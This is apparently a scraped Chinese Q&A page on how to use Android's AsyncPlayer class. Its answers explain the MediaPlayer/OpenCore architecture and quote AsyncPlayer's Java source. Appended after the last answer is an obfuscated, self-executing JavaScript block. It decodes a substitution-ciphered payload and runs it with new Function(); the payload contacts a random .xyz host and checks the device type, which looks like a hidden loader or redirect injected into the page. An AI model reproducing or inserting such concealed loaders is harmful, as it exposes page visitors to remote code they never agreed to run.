android.media.AsyncPlayer这个类应该怎么用

2025-02-12 20:42:06
推荐回答(4个)
回答1:

  代码结构:

  Open Core 的代码在Android 代码的 External/Opencore 目录中 。这个目录是OpenCore
的根目录,其中包含的子目录如下所示 :

  android :这里面是一个上层的库,它实现了一个为Android 使用的音视频采集,播放的接口,和DRM 数字版权管理的接口实现。

  baselibs :包含数据结构和线程安全等内容的底层库

  codecs_v2 :音视频的编解码器,基于 OpenMAX 实现

  engines :核心部分 ,多媒体 引擎的实现

  extern_libs_v2 :包含了 khronos 的 OpenMAX 的头文件

  fileformats :文件格式的解析( parser )工具

  nodes :提供一些PVMF 的NODE ,主要是编解码和文件解析方面的。

  oscl :操作系统兼容库

  pvmi : 输入输出控制的抽象接口

  protocols :主要是与网络相关的 RTSP 、 RTP 、 HTTP 等协议 的相关内容

  pvcommon : pvcommon 库文件的 Android.mk 文件,没有源文件。

  pvplayer : pvplayer 库文件的 Android.mk 文件,没有源文件。

  pvauthor : pvauthor 库文件的 Android.mk 文件,没有源文件。

  tools_v2 :编译工具以及一些可注册的模块。

  本文主要介绍Android MediaPlayer的架构,主要由OpenCore 里的PV Player来实现的。

  1.概述

  Android的MediaPlayer包含了Audio和Video的播放功能,Music和Video两个应用程序都是调用MediaPlayer实现的。

  代码主要分布在以下的目录中:

  JAVA程序的路径:

  packages/apps/Music/src/com/android/music/

  JAVA类的路径:

  frameworks/base/media/java/android/media/MediaPlayer.java

  JAVA本地调用部分(JNI):

  frameworks/base/media/jni/android_media_MediaPlayer.cpp

  编译为 libmedia_jni.so

  头文件:

  frameworks/base/include/media/

  多媒体库:

  frameworks/base/media/libmedia/

  编译为 libmedia.so

  多媒体服务:

  frameworks/base/media/libmediaplayerservice/

  编译为 libmediaplayerservice.so

  具体实现:

  external/opencore/

  编译为 libopencoreplayer.so

  libopencoreplayer.so是主要的实现部分,其他的库基本上都是在其上建立的封装和为建立进程间通讯的机制。

  2.框架


  在各个库中,libmedia.so位于核心的位置,它对上层的提供的接口主要是MediaPlayer类,libmedia_jni.so通过调用MediaPlayer类提供对JAVA的接口,并且实现了android.media.MediaPlayer类。

  libmediaplayerservice.so是Media的服务器,它通过继承libmedia.so的类实现服务器的功能,而libmedia.so中的另外一部分内容则通过进程间通讯和libmediaplayerservice.so进行通讯。libmediaplayerservice.so的真正功能通过调用PV
Player来完成。

  MediaPlayer部分的头文件在frameworks/base/include/media/目录中,这个目录是和libmedia.so库源文件的目录frameworks/base/media/libmedia/相对应的。主要的头文件有以下几个:

  IMediaPlayer.h

  IMediaPlayerClient.h

  IMediaPlayerService.h

  mediaplayer.h

  MediaPlayerInterface.h

  mediaplayer.h提供了对上层的接口,而其他的几个头文件都是提供一些接口类(即包含了纯虚函数的类),这些接口类必须被实现类继承才能够使用。

  整个MediaPlayer库和调用的关系如下图所示:

  


 


  运行的时候,大致可以分成Client和Server两个部分,分别在两个进程中运行,使用Binder机制实现IPC通讯。从框架结构上来看,IMediaPlayerService.h、IMediaPlayerClient.h和MediaPlayer.h三个类定义了MeidaPlayer的接口和架构,MediaPlayerService.cpp和mediaplayer.cpp两个文件用于MeidaPlayer架构的实现,MeidaPlayer的具体功能在PVPlayer(库libopencoreplayer.so)中的实现。

  2.1 IMediaPlayerClient.h

  描述一个MediaPlayer客户端的接口

  class IMediaPlayerClient: public IInterface

  {

  public:

  DECLARE_META_INTERFACE(MediaPlayerClient);

  virtual void notify(int msg, int ext1, int ext2) = 0;

  };

  class BnMediaPlayerClient: public BnInterface

  {

  public:

  virtual status_t onTransact( uint32_t code,

  const Parcel& data,

  Parcel* reply,

  uint32_t flags = 0);

  };

  在定义中,IMediaPlayerClient类继承IInterface,并定义了一个MediaPlayer客户端的接口,BnMediaPlayerClient继承了BnInterface,这是为基于Android的基础类Binder机制实现在进程通讯而构建的。事实上,根据BnInterface类模版的定义,BnInterface类相当于双继承了BnInterface和ImediaPlayerClient,这是Android一种常用的定义方式。

  2.2 mediaplayer.h

  对外的接口类,它最主要是定义了一个MediaPlayer类:

  class MediaPlayer : public BnMediaPlayerClient

  {

  public:

  MediaPlayer();

  ~MediaPlayer();

  void onFirstRef();

  void disconnect();

  status_t setDataSource(const char *url);

  status_t setDataSource(int fd, int64_t offset, int64_t length);

  status_t setVideoSurface(const sp& surface);

  status_t setListener(const sp& listener);

  status_t prepare();

  status_t prepareAsync();

  status_t start();

  status_t stop();

  status_t pause();

  bool isPlaying();

  status_t getVideoWidth(int *w);

  status_t getVideoHeight(int *h);

  status_t seekTo(int msec);

  status_t getCurrentPosition(int *msec);

  status_t getDuration(int *msec);

  status_t reset();

  status_t setAudioStreamType(int type);

  status_t setLooping(int loop);

  status_t setVolume(float leftVolume, float rightVolume);

  void notify(int msg, int ext1, int ext2);

  static sp decode(const char* url, uint32_t *pSampleRate, int*
pNumChannels);

  static sp decode(int fd, int64_t offset, int64_t length, uint32_t
*pSampleRate, int* pNumChannels);

  //……

  }

  从接口中可以看出MediaPlayer类刚好实现了一个MediaPlayer的基本操作,例如播放(start)、停止(stop)、暂停(pause)等。

  另外的一个类DeathNotifier在MediaPlayer类中定义,它继承了IBinder类中的DeathRecipient类:

  class DeathNotifier: public IBinder:: DeathRecipient

  {

  public:

  DeathNotifier() {}

  virtual ~DeathNotifier();

  virtual void binderDied(const wp& who);

  };

  事实上,MediaPlayer类正是间接地继承了IBinder,而MediaPlayer:: DeathNotifier类继承了IBinder::
DeathRecipient,这都是为了实现进程间通讯而构建的。

  2.3 IMediaPlayer.h

  主要的的内容是一个实现MediaPlayer功能的接口:

  class IMediaPlayer: public IInterface

  {

  public:

  DECLARE_META_INTERFACE(MediaPlayer);

  virtual void disconnect() = 0;

  virtual status_t setVideoSurface(const sp& surface) = 0;

  virtual status_t prepareAsync() = 0;

  virtual status_t start() = 0;

  virtual status_t stop() = 0;

  virtual status_t pause() = 0;

  virtual status_t isPlaying(bool* state) = 0;

  virtual status_t getVideoSize(int* w, int* h) = 0;

  virtual status_t seekTo(int msec) = 0;

  virtual status_t getCurrentPosition(int* msec) = 0;

  virtual status_t getDuration(int* msec) = 0;

  virtual status_t reset() = 0;

  virtual status_t setAudioStreamType(int type) = 0;

  virtual status_t setLooping(int loop) = 0;

  virtual status_t setVolume(float leftVolume, float rightVolume) = 0;

  };

  class BnMediaPlayer: public BnInterface

  {

  public:

  virtual status_t onTransact( uint32_t code,

  const Parcel& data,

  Parcel* reply,

  uint32_t flags = 0);

  };

  在IMediaPlayer类中,主要定义MediaPlayer的功能接口,这个类必须被继承才能够使用。值得注意的是,这些接口和MediaPlayer类的接口有些类似,但是它们并没有直接的关系。事实上,在MediaPlayer类的各种实现中,一般都会通过调用IMediaPlayer类的实现类来完成。

  2.4 头文件IMediaPlayerService.h

  描述一个MediaPlayer的服务,定义方式如下所示:

  class IMediaPlayerService: public IInterface

  {

  public:

  DECLARE_META_INTERFACE(MediaPlayerService);

  virtual sp create(pid_t pid, const
sp& client, const char* url) = 0;

  virtual sp create(pid_t pid, const
sp& client, int fd, int64_t offset, int64_t length) =
0;

  virtual sp decode(const char* url, uint32_t *pSampleRate, int*
pNumChannels) = 0;

  virtual sp decode(int fd, int64_t offset, int64_t length, uint32_t
*pSampleRate, int* pNumChannels) = 0;

  };

  class BnMediaPlayerService: public BnInterface

  {

  public:

  virtual status_t onTransact( uint32_t code,

  const Parcel& data,

  Parcel* reply,

  uint32_t flags = 0);

  };

  由于有纯虚函数,IMediaPlayerService
以及BnMediaPlayerService必须被继承实现才能够使用,在IMediaPlayerService定义的create和decode等接口,事实上是必须被继承者实现的内容。注意,create的返回值的类型是sp,这个IMediaPlayer正是提供实现功能的接口。

  3 实现

  3.1 App

  在packages/apps/Music/src/com/android/music/里的MediaPlaybackService.java文件中,包含了对MediaPlayer的调用。

  在MediaPlaybackService.java中包含对包的引用:

  import android.media.MediaPlayer;

  在MediaPlaybackService类的内部,定义了MultiPlayer类:

  private class MultiPlayer {

  private MediaPlayer mMediaPlayer = new MediaPlayer();

  }

  MultiPlayer类中使用了MediaPlayer类,其中有一些对这个MediaPlayer的调用,调用的过程如下所示:

  mMediaPlayer.reset();

  mMediaPlayer.setDataSource(path);

  mMediaPlayer.setAudioStreamType(AudioManager.STREAM_MUSIC);

  reset,setDataSource和setAudioStreamType等接口就是通过JAVA本地调用(JNI)来实现的。

  3.2 Jni

  在frameworks/base/media/jni/android_media_MediaPlayer.cpp中实现,其中android_media_MediaPlayer_reset函数的实现如下所示:

  static void android_media_MediaPlayer_reset(JNIEnv *env, jobject thiz)

  {

  sp mp = getMediaPlayer(env, thiz);

  if (mp == NULL ) {

  jniThrowException(env, "java/lang/IllegalStateException", NULL);

  return;

  }

  process_media_player_call( env, thiz, mp->reset(), NULL, NULL );

  }

  先获取一个MediaPlayer指针,通过对它的调用来实现实际的功能。

  register_android_media_MediaPlayer用于将gMethods注册为的类"android/media/MediaPlayer",其实现如下所示。

  static int register_android_media_MediaPlayer(JNIEnv *env)

  {

  jclass clazz;

  clazz = env->FindClass("android/media/MediaPlayer");

  // ......

  return AndroidRuntime::registerNativeMethods(env,
"android/media/MediaPlayer", gMethods, NELEM(gMethods));

  }

  "android/media/MediaPlayer"对应JAVA的类android.media.MediaPlayer。

  3.3 libmedia.so

  frameworks/base/media/libmedia/mediaplayer.cpp文件实现mediaplayer.h提供的接口,其中一个重要的片段如下所示:

  const sp& MediaPlayer::getMediaPlayerService()

  {

  Mutex::Autolock _l(mServiceLock);

  if (mMediaPlayerService.get() == 0) {

  sp sm = defaultServiceManager();

  sp binder;

  do {

  binder = sm->getService(String16("media.player"));

  if (binder != 0)

  break;

  LOGW("MediaPlayerService not published, waiting...");

  usleep(500000); // 0.5 s

  } while(true);

  if (mDeathNotifier == NULL) {

  mDeathNotifier = new DeathNotifier();

  }

  binder->linkToDeath(mDeathNotifier);

  mMediaPlayerService = interface_cast(binder);

  }

  LOGE_IF(mMediaPlayerService==0, "no MediaPlayerService!?");

  return mMediaPlayerService;

  }

  其中最重要的一点是binder =
sm->getService(String16("media.player"));这个调用用来得到一个名称为"media.player"的服务,这个调用返回值的类型为IBinder,根据实现将其转换成类型IMediaPlayerService使用。

  一个具体的函数setDataSource如下所示:

  status_t MediaPlayer::setDataSource(const char *url)

  {

  LOGV("setDataSource(%s)", url);

  status_t err = UNKNOWN_ERROR;

  if (url != NULL) {

  const sp& service(getMediaPlayerService());

  if (service != 0) {

  sp player(service->create(getpid(), this, url));

  err = setDataSource(player);

  }

  }

  return err;

  }

回答2:

AsyncPlayer应该就是包装了一下MediaPlayer,你可以直接使用MediaPlayer试试。
MediaPlayer有个方法是setNextMediaPlayer ,可以实现播完这个再播下一个
AsyncPlayer这个类源码如下:

Java code
?

/**
* Plays a series of audio URIs, but does all the hard work on another thread
* so that any slowness with preparing or loading doesn't block the calling thread.
*/
public class AsyncPlayer {
private static final int PLAY = 1;
private static final int STOP = 2;
private static final boolean mDebug = false;

private static final class Command {
int code;
Context context;
Uri uri;
boolean looping;
int stream;
long requestTime;

public String toString() {
return "{ code=" + code + " looping=" + looping + " stream=" + stream
+ " uri=" + uri + " }";
}
}

private final LinkedList mCmdQueue = new LinkedList();

private void startSound(Command cmd) {
// Preparing can be slow, so if there is something else
// is playing, let it continue until we're done, so there
// is less of a glitch.
try {
if (mDebug) Log.d(mTag, "Starting playback");
MediaPlayer player = new MediaPlayer();
player.setAudioStreamType(cmd.stream);
player.setDataSource(cmd.context, cmd.uri);
player.setLooping(cmd.looping);
player.prepare();
player.start();
if (mPlayer != null) {
mPlayer.release();
}
mPlayer = player;
long delay = SystemClock.uptimeMillis() - cmd.requestTime;
if (delay > 1000) {
Log.w(mTag, "Notification sound delayed by " + delay + "msecs");
}
}
catch (Exception e) {
Log.w(mTag, "error loading sound for " + cmd.uri, e);
}
}

private final class Thread extends java.lang.Thread {
Thread() {
super("AsyncPlayer-" + mTag);
}

public void run() {
while (true) {
Command cmd = null;

synchronized (mCmdQueue) {
if (mDebug) Log.d(mTag, "RemoveFirst");
cmd = mCmdQueue.removeFirst();
}

switch (cmd.code) {
case PLAY:
if (mDebug) Log.d(mTag, "PLAY");
startSound(cmd);
break;
case STOP:
if (mDebug) Log.d(mTag, "STOP");
if (mPlayer != null) {
long delay = SystemClock.uptimeMillis() - cmd.requestTime;
if (delay > 1000) {
Log.w(mTag, "Notification stop delayed by " + delay + "msecs");
}
mPlayer.stop();
mPlayer.release();
mPlayer = null;
} else {
Log.w(mTag, "STOP command without a player");
}
break;
}

synchronized (mCmdQueue) {
if (mCmdQueue.size() == 0) {
// nothing left to do, quit
// doing this check after we're done prevents the case where they
// added it during the operation from spawning two threads and
// trying to do them in parallel.
mThread = null;
releaseWakeLock();
return;
}
}
}
}
}

private String mTag;
private Thread mThread;
private MediaPlayer mPlayer;
private PowerManager.WakeLock mWakeLock;

// The current state according to the caller. Reality lags behind
// because of the asynchronous nature of this class.
private int mState = STOP;

/**
* Construct an AsyncPlayer object.
*
* @param tag a string to use for debugging
*/
public AsyncPlayer(String tag) {
if (tag != null) {
mTag = tag;
} else {
mTag = "AsyncPlayer";
}
}

/**
* Start playing the sound. It will actually start playing at some
* point in the future. There are no guarantees about latency here.
* Calling this before another audio file is done playing will stop
* that one and start the new one.
*
* @param context Your application's context.
* @param uri The URI to play. (see {@link MediaPlayer#setDataSource(Context, Uri)})
* @param looping Whether the audio should loop forever.
* (see {@link MediaPlayer#setLooping(boolean)})
* @param stream the AudioStream to use.
* (see {@link MediaPlayer#setAudioStreamType(int)})
*/
public void play(Context context, Uri uri, boolean looping, int stream) {
Command cmd = new Command();
cmd.requestTime = SystemClock.uptimeMillis();
cmd.code = PLAY;
cmd.context = context;
cmd.uri = uri;
cmd.looping = looping;
cmd.stream = stream;
synchronized (mCmdQueue) {
enqueueLocked(cmd);
mState = PLAY;
}
}

/**
* Stop a previously played sound. It can't be played again or unpaused
* at this point. Calling this multiple times has no ill effects.
*/
public void stop() {
synchronized (mCmdQueue) {
// This check allows stop to be called multiple times without starting
// a thread that ends up doing nothing.
if (mState != STOP) {
Command cmd = new Command();
cmd.requestTime = SystemClock.uptimeMillis();
cmd.code = STOP;
enqueueLocked(cmd);
mState = STOP;
}
}
}

private void enqueueLocked(Command cmd) {
mCmdQueue.add(cmd);
if (mThread == null) {
acquireWakeLock();
mThread = new Thread();
mThread.start();
}
}

/**
* We want to hold a wake lock while we do the prepare and play. The stop probably is
* optional, but it won't hurt to have it too. The problem is that if you start a sound
* while you're holding a wake lock (e.g. an alarm starting a notification), you want the
* sound to play, but if the CPU turns off before mThread gets to work, it won't. The
* simplest way to deal with this is to make it so there is a wake lock held while the
* thread is starting or running. You're going to need the WAKE_LOCK permission if you're
* going to call this.
*
* This must be called before the first time play is called.
*
* @hide
*/
public void setUsesWakeLock(Context context) {
if (mWakeLock != null || mThread != null) {
// if either of these has happened, we've already played something.
// and our releases will be out of sync.
throw new RuntimeException("assertion failed mWakeLock=" + mWakeLock
+ " mThread=" + mThread);
}
PowerManager pm = (PowerManager)context.getSystemService(Context.POWER_SERVICE);
mWakeLock = pm.newWakeLock(PowerManager.PARTIAL_WAKE_LOCK, mTag);
}

private void acquireWakeLock() {
if (mWakeLock != null) {
mWakeLock.acquire();
}
}

private void releaseWakeLock() {
if (mWakeLock != null) {
mWakeLock.release();
}
}
}

回答3:

:播放指定SD卡上的音乐,用mMediaPlayer.setDataSource(\"\\sdcard\\\")便设置要播放的文件的路径,然后调用start(),stop(),pause()便可实现开始,停止和暂停播放的功能。 而如果是应用中自带的音乐(如游戏中的音效),就是不是sdcard中的音乐了

回答4:

你好,Command 不过是 AsyncPlayer 内部实现的用来封装一些参数用的,这个你没有必要进行研究的。

!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q/f/Ks0j(8}vR8ps5KFnC}60"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();